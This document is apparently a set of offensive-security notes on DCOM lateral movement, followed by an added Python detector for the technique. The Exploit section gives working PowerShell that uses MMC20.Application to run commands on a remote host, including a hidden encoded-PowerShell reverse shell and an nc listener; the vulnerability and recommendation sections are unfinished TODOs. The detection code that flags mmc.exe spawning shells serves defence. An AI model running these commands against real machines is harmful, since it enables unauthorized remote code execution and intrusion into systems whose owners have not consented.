DCOM Abuse

Table of contents

  1. Vulnerability
  2. Prerequisites
  3. Exploit
  4. Recommendations

Vulnerability

TODO: Describe the vulnerability here.

Prerequisites

  • Local administrator rights on the target machine.

Exploit

Run the following from an elevated PowerShell prompt:

# Instantiate Microsoft Management Console on remote target.
$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","$target"))

# Execute remote command
$dcom.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c $command","7")

Similar to WinRM Abuse, you can spawn a reverse shell on the target machine.

$dcom.Document.ActiveView.ExecuteShellCommand("powershell",$null,"powershell -nop -w hidden -e $payload","7")

Don’t forget to run your listener first.

nc -lnvp $lport

Recommendations

  • TODO: List recommendations here.
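
To detect the MMC20.Application technique shown in the Exploit section, look on the target for mmc.exe started with -Embedding by the DCOM service host, and for a shell started as a child of that mmc.exe. The following is an added example, not part of the original notes; it assumes process-creation telemetry with Sysmon Event ID 1 field names, and the sample events, hosts and process IDs are constructed.

```python
# Added example: flags process-creation events consistent with MMC20.Application
# DCOM execution. Field names follow Sysmon Event ID 1; all events are constructed.
from ntpath import basename  # Windows path handling on any OS

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

def _name(path):
    return basename(path or "").lower()

def classify(event):
    """Return a finding label for one process-creation event, or None."""
    image, parent = _name(event.get("Image")), _name(event.get("ParentImage"))
    cmdline = (event.get("CommandLine") or "").lower()
    parent_cmd = (event.get("ParentCommandLine") or "").lower()
    # DCOM activation: the service host starts mmc.exe with -Embedding.
    if image == "mmc.exe" and parent == "svchost.exe" and "-embedding" in cmdline:
        return "mmc-dcom-activation"
    # ExecuteShellCommand: the requested program runs as a child of mmc.exe.
    if parent == "mmc.exe" and image in SHELLS:
        # An interactive console (no -Embedding) is lower confidence.
        return "shell-from-dcom-mmc" if "-embedding" in parent_cmd else "shell-from-mmc"
    return None

def scan(events):
    """Return (Computer, ProcessId, label) for every event that matches."""
    return [(e["Computer"], e["ProcessId"], label)
            for e in events if (label := classify(e))]

def _ev(computer, pid, image, cmd, parent, parent_cmd):
    return {"Computer": computer, "ProcessId": pid, "Image": image,
            "CommandLine": cmd, "ParentImage": parent, "ParentCommandLine": parent_cmd}

SYS = "C:\\Windows\\System32\\"
# Constructed sample events (hypothetical hosts and PIDs).
SAMPLE_EVENTS = [
    _ev("WS01", 4120, SYS + "mmc.exe", SYS + "mmc.exe -Embedding",
        SYS + "svchost.exe", SYS + "svchost.exe -k DcomLaunch -p"),
    _ev("WS01", 5236, SYS + "cmd.exe", "cmd /c whoami",
        SYS + "mmc.exe", SYS + "mmc.exe -Embedding"),
    _ev("WS02", 2200, SYS + "mmc.exe", "mmc.exe " + SYS + "eventvwr.msc",
        "C:\\Windows\\explorer.exe", "explorer.exe"),
    _ev("WS02", 3310, SYS + "WindowsPowerShell\\v1.0\\powershell.exe", "powershell.exe",
        SYS + "mmc.exe", "mmc.exe " + SYS + "services.msc"),
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```
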